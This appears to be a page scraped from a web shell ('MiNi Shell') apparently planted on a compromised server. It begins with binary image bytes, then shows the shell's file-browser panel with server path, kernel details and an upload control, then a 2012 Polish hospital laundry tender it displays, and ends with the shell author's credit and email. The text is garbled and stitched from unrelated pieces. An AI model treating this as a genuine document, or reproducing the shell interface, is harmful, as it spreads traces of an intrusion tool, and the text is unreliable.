JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120514/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120514/106593-N-2012.html

<p class="kh_header"><b>Warszawa: Obsługa Szpitala Wolskiego w zakresie świadczenia usług pralniczych - II</b><br>
<b>Numer ogłoszenia: 106593 - 2012; data zamieszczenia: 14.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wolski im. dr Anny Gostyńskiej Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kasprzaka 17, 01-211 Warszawa, woj. mazowieckie, tel. 022 3894859, faks 022 3894922.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wolski.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa Szpitala Wolskiego w zakresie świadczenia usług pralniczych - II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obsługa Szpitala Wolskiego w zakresie świadczenia usług pralniczych.
3.2.  OPIS PRZEDMIOTU ZAMÓWIENIA
1.Odbiór przedmiotu zamówienia przeznaczonego do prania oraz dostawa upranego przedmiotu zamówienia odbywać się będzie w miejscach - oddziałach wyznaczonych przez zamawiającego. Dostarczenia czystej bielizny do wyznaczonych przez zamawiającego miejsc będzie odbywać się w ciągu 24 godzin licząc od chwili odbioru bielizny brudnej.
2.Wykonawca zobowiązany jest do wykonania usługi prania w ramach interwencji (jeśli zajdzie taka potrzeba) w czasie nie dłuższym niż 8 godziny. Czas wykonania usługi w ramach interwencji należy rozumieć jako wykonanie jej w czasie nie przekraczającym 8 godzin licząc od momentu odbioru bielizny brudnej do chwili zwrotu bielizny czystej. Wykonawca zobowiązany jest udokumentować możliwości takiej usługi - załącznik nr 2.
3.pranie i maglowaniem bielizny szpitalnej
4.pranie i maglowanie odzieży personelu ( ze szczególną uwagą na guziki napy zamki)
5.pranie i dezynfekcja materacy kocy poduszek oraz innego asortymentu
6.pakowanie i dostarczanie czystej bielizny ( bez wszelkiego rodzaju zabrudzeń i plam) 
7.Odbiór brudnej bielizny bezpośrednio z Oddziałów Szpitala na podstawie spisu bielizny
8.oddzielne pranie i maglowanie bielizny operacyjnej 
9.dezynfekcja pościeli i odzieży skażonej 
3.3.    WYMAGANIA TECHNOLOGICZNE
1.	Zamawiający wymaga wskazania miejsca wykonywania usługi prania oraz przedstawienia dokumentu wystawionego przez Państwowego Powiatowego Inspektora Sanitarnego, potwierdzającego, że wskazana pralnia dysponuje barierą higieny.
2.	Usługa musi być wykonywana w pralni wyposażonej w park maszynowy z automatycznym systemem dozującym środki piorąco - dezynfekujące, posiadające system rejestracji i archiwizacji danych. Na potwierdzenie ww. warunków należy dołączyć do oferty wydruk raportu z systemu dozującego stosowne środki z jednego dnia, godziny procesu oraz numer programu - dokument z ostatniego dnia miesiąca przed terminem składania ofert.
3.	Zamawiający wymaga, aby proces dezynfekcji bielizny szpitalnej był przeprowadzany w czasie nie dłuższym niż 10 minut i w temperaturze nie wyższej niż 60°C. Środki dezynfekujące muszą zapewnić szeroki zakres działania biobójczego w stosunku do bakterii, grzybów, wirusów i spor z rodzaju Clostridium.
4.	Wykonawca przedstawi wykaz stosownych środków piorących i dezynfekujących wraz z dokumentami dopuszczającymi ich stosowanie oraz z kartami charakterystyki tych środków.
5.	Skuteczność stosowanej dezynfekcji wykonawca potwierdzi kopią badań mikrobiologicznych obejmujących:
Bieliznę czystą - co najmniej 4 badania w 2012 roku oraz co najmniej 2 badania w 2013 roku;
Pomieszczenia pralni, strony czystej - co najmniej 1 badanie;
Komory załadunkowe samochodów do transportu bielizny czystej - co najmniej 2 badania w 2011 roku  oraz co najmniej 2 badania w 2012 roku;
6.	Zamawiający nie dopuszcza stosowania preparatów i środków piorących oraz dezynfekujących z zawartością chloru i jego związków w jakiejkolwiek postaci w trakcie realizacji przedmiotu zamówienia.
7.	Wykonawca przedstawi dokumenty potwierdzające stały nadzór nad stosowaną w pralni technologią prania i dezynfekcji oraz systematyczne serwisowanie automatycznego systemu dozowania środków piorąco - dezynfekujących wraz z kalibracją pomp dozujących co najmniej 1 raz w miesiącu w roku ubiegłym i bieżącym, podpisane przez przedstawiciela producenta stosowanych środków.
8.	Wykonawca przedstawi wykaz środków transportu do przewozu bielizny czystej oraz opinię Państwowego Powiatowego Inspektora Sanitarnego potwierdzającą, że środki transportu są przystosowane do przewozu bielizny szpitalnej.
9.	Zamawiający nie dopuszcza udziału podwykonawców do wykonywania niniejszego zamówienia.
10.	 Odbiór całej odzieży odbywać się będzie bezpośrednio z Oddziałów Szpitala (odzież czysta i brudna) 
11.	Zestawienie ilościowe będzie rozliczane pod koniec miesiąca w Dziale ds. Gospodarczych i Zaopatrzenia.
12.	Firma ma obowiązek przygotować pod koniec miesiąca zestawienie ilościowe wypranej odzieży  z podziałem na Oddziały.
13.	Odzież ma być zapakowana w worki foliowe podzielona na Oddziały. 
14.	Każdorazowa odzież odbierana i zdawana do firmy będzie na podstawie kwitu za który odpowiedzialna jest Oddziałowa. 
15.	Pakowanie i dostarczanie czystej bielizny (bez wszelkiego rodzaju zabrudzeń i plam) z          zachowaniem podziału na poszczególne komórki organizacyjne - oddziały szpitalne , poradnie 
16.	Oddzielne pranie i maglowanie bielizny operacyjnej 
17.	dostarczanie własnym transportem i rozładunek czystej bielizny do wskazanych przez Zamawiającego miejsc w Szpitalu
18.	Wykonawca gwarantuje nie mieszanie bielizny Szpitala z bielizny z innych placówek
19.	Wykonawca ponosi odpowiedzialność za rzeczy uszkodzone w czasie prania maglowania prasowania jak również w czasie transportu. Jeśli uszkodzenie ze względów funkcjonalnych lub estetycznych nie pozwala na dalsze użytkowanie bielizny, Wykonawca ponosi koszty związane z jej odkupieniem
20.	Zamawiający wymaga aby w okresie kumulacji dni wolnych w dniu poprzedzającym święto był dodatkowy odbiór brudnej i dostawa czystej bielizny po wcześniejszym trzydniowym uzgodnieniu
21.	Wykonawca jest zobowiązany zabezpieczyć ładunek brudnej bielizny szpitalnej przed uszkodzeniem dostępem do osób trzecich , wpływem czynników zewnętrznych oraz wpływem ładunku na otoczenie
22.	Bielizna szpitalna pościelowa wracająca powinna być złożona lewą strona do wierzchu
23.	Czysta bielizna powinna być szczelnie zapakowana w worki foliowe (koloru białego przezroczyste) a w czasie transportu w dodatkowy worek lub zamykany pojemnik tak aby zabezpieczyć bieliznę przed powtórnym zabrudzeniem ; bielizna i odzież ochronna czysta będzie pakowana w worki folii LDPE białej o grubości nie mniejszej niż 0,03 mm wypełnione do 2/3 objętości w celu zabezpieczenia przed ewentualnym zabrudzeniem
24.	Fartuchy i mundurki personelu z wyjątkiem odzieży operacyjnej powinny być prasowane i dosmaczane w stanie powieszonym na wieszakach i zafoliowane ( z podziałem na odpowiednie komórki organizacyjne)
25.	Usługa będzie wykonywana transportem Wykonawcy który ponosi koszty związane z transportem ( w tym zabezpieczenia bielizny na czas transportu - worki , folia)
26.	Zamawiający zastrzega sobie prawo do wykonywania audytów u Wykonawcy i badań czystości bielizny w dowolnym czasie
27.	Organizacja transportu załadunku i rozładunku bielizny szpitalnej będzie gwarantowała nie krzyżowanie się dróg czystych i brudnych oraz  będzie wykluczała kontakt czystej bielizny z brudną. 
28.	Wykonawca zobowiązany jest do okresowego wykonywania badan mikrobiologicznych z magla, regałów do czystej  bielizny, rąk personelu (dwóch pracowników). Wyniki badan mikrobiologicznych Wykonawca dostarczy Zamawiającemu przynajmniej raz w kwartale.
29.	Wykonawca na prośbę Zamawiającego dostarczy kopię dokumentacji z kontroli przeprowadzonych przez właściwą stację sanitarno epidemiologiczną. 
3.4.   Zakres zamówienia:
Ilości asortymentu podane są szacunkowo i mogą ulec zmianie w ramach wartości umowy, w zależności od potrzeb Zamawiającego. Wykonawca nie będzie wnosił roszczeń w stosunku do Zamawiającego w przypadku nie wyczerpania przez okres związania umową  ilości wymienionych w załączniku do umowy.
Ilości podane są w załączniku nr 6  ; waga poszczególnych elementów zamówienia podana w załączniku nr 7.
3.5.  KOD CPV:  98.31.00.00-9.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy przystępujący do postępowania zobowiązani są wnieść wadium kwocie: 13.090,80 PLN (słownie: trzynaście tysięcy dziewięćdziesiąt złotych i osiemdziesiąt groszy).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Certyfikat ISO lub inny równoważny, potwierdzający spełnienie norm zarządzania jakością w zakresie świadczenia usług pralniczych na rzecz placówek służby zdrowia.
2)	Dokumenty dopuszczające środki piorące i dezynfekujące do obrotu, tj. atesty i badania środków piorących i dezynfekujących, które będą używane w procesie prania i dezynfekcji bielizny i odzieży szpitalnej oraz materaców.  
3)	Opinię sanitarną - wydaną przez Państwowy Inspektorat Sanitarno - Epidemiologiczny w oparciu przeprowadzoną kontrolę sanitarno - epidemiologiczną stwierdzającą, że pralnia spełnia wymagania określone w Rozporządzeniu Ministra Zdrowia  z dnia 22 czerwca 2005 roku (Dz. U. Nr 116 poz. 985), w zakresie prania bielizny dla jednostek służby zdrowia, lecznictwa otwartego i zamkniętego;
8)	Pełnomocnictwo do podpisania oferty. Pełnomocnictwo należy załączyć do oferty tylko w przypadku, gdy oferta jest podpisania przez osobę nie figurującą w rejestrze lub wpisie do ewidencji działalności gospodarczej. Brak podpisu na ofercie lub podpisanie oferty przez osobę do tego nieupoważnioną spowoduje konieczność odrzucenia oferty. W przypadku składnia oferty przez podmioty występujące wspólnie, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego jeżeli oferta nie jest podpisana przez wszystkich Wykonawców występujących wspólnie. Postępowanie o udzielenie zamówienia publicznego nie jest postępowaniem sądowym, stwierdzić należy, że złożenie dokumentu pełnomocnictwa lub prokury albo jego odpisu, wypisu lub kopii przez pełnomocnika wykonawcy w postępowaniu o udzielenie zamówienia publicznego nie podlega opłacie skarbowej.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony formularz oferty - załącznik nr 1 do SIWZ 
2)	Załącznik nr 2 - Oświadczenie, że Wykonawca dysponuje potencjałem do wykonania usługi w ciągu nie więcej niż 8 godzin od momentu zgłoszenia przez Zamawiającego takiego zapotrzebowania do Wykonawcy.
3)	Istotne dla stron postanowienia, które zostaną wprowadzone do treści umowy  - Załącznik nr 5 do SIWZ.
4)	Zestawienie ilościowe poszczególnych elementów przedmiotu zamówienia - załącznik nr 6.
5)	Wykaz punktów odbioru i zdawania bielizny szpitalnej  - załącznik nr 7.
6)	Załącznik nr 8 - oświadczenie. 
7)	Dowód wpłaty wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące możliwości zmian niniejszej umowy w przypadku wystąpienie okoliczności, których nie można było przewiedzieć w chwili zawarcia umowy:
1)	okoliczności nieprzewidzianych w chwili zawarcia umowy lub sa korzystne dla Zamawiającego,
2)	zmiany warunków wykonywania umowy, w przypadku gdy nie ma to wpływu na cenę umowy.	
3)	wydłużenia terminu realizacji umowy, o którym mowa w § 1 ust. 4 niniejszej umowy, z chwilą niewykorzystania przez Zamawiającego wartości umowy, o której mowa w § 5 niniejszej umowy;
4)	zmiany terminu realizacji umowy, w przypadku gdy zmiana jest korzystna dla Zamawiającego lub zmiany nie dało się przewidzieć w chwili zawierania umowy,
Zmiana danych teleadresowych stron wymaga niezwłocznego pisemnego powiadomienia drugiej strony umowy i nie stanowi zmiany umowy. W przypadku braku powiadomienia wszelkie pisma wysłane na adres i numer faksu wskazane w niniejszej umowie uznaje sie za skutecznie doręczone</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wolski.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wolski im. dr Anny Gostyńskiej, Samodzielny Publiczny Zakład Opieki Zdrowotnej, 01 - 211 Warszawa, ul. Kasprzaka 17 - pawilon nr 8 sekcja zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2012 godzina 08:00, miejsce: Szpital Wolski im. dr Anny Gostyńskiej, Samodzielny Publiczny Zakład Opieki Zdrowotnej, 01 - 211 Warszawa, ul. Kasprzaka 17 - pawilon nr 2 Kancelaria główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com